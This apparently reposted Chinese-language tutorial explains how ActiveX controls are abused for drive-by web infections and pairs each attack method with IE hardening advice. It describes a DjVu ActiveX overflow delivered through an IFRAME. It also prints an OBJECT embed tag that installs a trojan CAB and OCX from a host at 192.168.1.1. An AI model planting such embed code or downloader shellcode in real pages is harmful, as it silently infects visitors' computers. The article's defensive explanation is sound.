曾幾何時, 利用ActiveX是流氓軟件“行凶”的主要技術手段之一,如今流氓軟件大多都已經作古了,可ActiveX並沒有退出人們的視野,網頁掛馬看上了它,於是ActiveX掛馬流行起來,成為了重要的幾種掛馬方式之一。
北岸團隊張貴嶺:資深安全工程師,從事安全行業十余年。
ActiveX是微軟開發的。微軟的程序員似乎把世界想象得太過於善良,認為沒有人會用ActiveX作惡。當年惡意軟件流行的時期,一家名為“XX寶貝視頻聊天室”的網站就曾利用色誘的方式,誘惑用戶主動安裝網站的ActiveX視頻聊天控件。
該ActiveX控件不僅會主動跟蹤用戶網絡信息,而且還有彈出廣告、上傳用戶Word文檔等流氓行為。當利用ActiveX作惡的流氓軟件越來越多後,微軟在IE7中就忍痛添加了關於ActiveX認證的措施。如今所有的ActiveX在IE7中都會先屏蔽,而不再像當初一樣主動彈出安裝窗口。
小百科:ActiveX是Microsoft對於一系列策略性面向對象程序技術和工具的稱呼,ActiveX控件在使用時需要安裝。
誰捧紅了ActiveX掛馬?
在流氓軟件野蠻生長的那幾年,流氓軟件也如同各路山賊土匪一樣,往往會因為爭奪用戶電腦中的重要位置而發生火拼,於是許多用來制造病毒的技術被應用到了這些流氓軟件身上。tW.wIngwiT.CoM後來病毒也開始向流氓軟件取經,流氓軟件使用的一些技術也被病毒拿來使用,ActiveX掛馬應該是病毒從流氓軟件身上學習的最徹底的技術。
小百科:許多浏覽器在支持ActiveX方面並不如IE來得積極,雖然Firefox、網景等浏覽器都在不同程度上支持ActiveX,但是ActiveX出現問題最多的仍然是IE浏覽器。
ActiveX會被掛馬者利用,其實主要問題在於它的認證機制。早期,如果一個網站上有需要安裝ActiveX才能夠看到的東西,那麼在你訪問該網站的時候,相關的ActiveX會反復地彈出提示要求你安裝它,許多用戶往往會因為各種原因點擊“確定”,允許ActiveX控件安裝。
這就如同你走在馬路上,有一群人說自己原意跟你交朋友,這些人在你面前一一經過,你可以選擇點頭同意或者搖頭否定,凡是你點頭同意的人都可以成為你的朋友,他們可以自由進出你的家。恐怖的是,有些人在成為你朋友之後,你才發現他是個小偷或者無賴流氓。
目前利用ActiveX掛馬主要有兩種形式,一種是利用正常程序的ActiveX漏洞進行溢出掛馬,另外一種則是直接編寫惡意的ActiveX木馬程序,將惡意的木馬程序偽裝成看似有某項功能的ActiveX控件,欺騙用戶安裝。接下來的案例中我們將會為大家演示黑客如何利用ActiveX掛馬。
ActiveX掛馬攻防實錄
方法1:通過漏洞掛馬
攻黑客利用ActiveX進行網頁掛馬,最常見的方法就是利用那些有漏洞的ActiveX控件進行掛馬,通過用戶系統內已有的ActiveX控件的觸發,讓木馬在不知不覺中植入用戶的電腦。
其中利用軟件ActiveX漏洞發動攻擊的著名例子有Flash和RealPlayer的ActiveX漏洞掛馬程序,這些軟件的ActiveX漏洞都曾經造成了極大的危害,特別是RealPlayer至今仍然有黑客在使用它的ActiveX漏洞進行掛馬。
下面以DjVu ActiveX控件漏洞為例講解掛馬的具體步驟,首先將惡意代碼輸入到寫字板中,然後另存為任意的HTML文件,然後利用IFRAME代碼將生成的HTML文件嵌入到正常的網頁中,此時輸入網址打開含有DjVu ActiveX控件漏洞的網頁,本機的計算器程序就會被觸發開啟。而黑客通常不會這麼善良,他們會將Shellcode代碼修改成下載指定惡意程序的代碼,然後讓用戶在打開相關網站後中招(圖1)。
小百科:DjVu ActiveX控件是用於壓縮圖形文件的工具,它在處理超長的ImageURL屬性參數時會出現溢出。
防對於利用ActiveX漏洞來進行掛馬的行為,最好的防范方法是使用IE之外的浏覽器,例如Firefox、Maxthon或360安全浏覽器。此外,最好能夠安裝防掛馬軟件。
方法2:編寫ActiveX木馬
攻ActiveX木馬是利用一些用戶盲目地點擊網頁上彈出的ActiveX詢問安裝按鈕的習慣而進行傳播的。許多用戶往往並不能夠分辨出哪些ActiveX控件是無害的,哪些ActiveX控件是有害的。
那些ActiveX木馬會打著視頻聊天、美女圖庫等誘惑性的幌子,一些經不起誘惑的用戶就會沖動性地安裝網頁中的ActiveX木馬。
編寫ActiveX木馬,需要一定的編程基礎,而且整個過程相當復雜,由於版面的原因,這裡只向各位想成為安全工程師的朋友簡單闡述一下ActiveX木馬的大致編寫過程。
首先黑客會編寫一個具有Download或者其他惡意功能的OCX控件,這是ActiveX木馬的核心和靈魂,然後黑客會再編寫一個Setup安全設置的INF文件,用CAB壓縮工具,例如WinCAB,將兩個文件壓縮打包成一個CAB文件。
最後黑客將該文件上傳到自己的網站中,並在網頁中寫入調用安裝ActiveX控件的代碼即可開張等待浏覽該網頁的用戶上鉤(圖2)。
調用代碼如下:
<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237
codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>
<PARAM NAME="Setup" VALUE="http:// 192.168.1.1/web/download.ocx">
</OBJECT>
這樣的ActiveX木馬是沒有簽名驗證的,通常不會被允許安裝,但是仍然有方法可以突破這些安全限制。
防要避免ActiveX木馬的攻擊只要禁止ActiveX木馬被調用運行就可以了。
防范此種方式掛馬的最好方法還是在客戶終端機上操作,在客戶終端機運行IE浏覽器,點擊“工具→Internet選項→安全→自定義級別”,將安全級別定義為“高”,對“ActiveX控件和插件”中第2項、第3項設置為“禁用”,其他項設置為“提示”,之後點擊“確定”(圖3)。這樣設置後,當你使用IE浏覽網頁時,就能有效避免ActiveX木馬的攻擊。
From:http://tw.wingwit.com/Article/Network/201309/88.html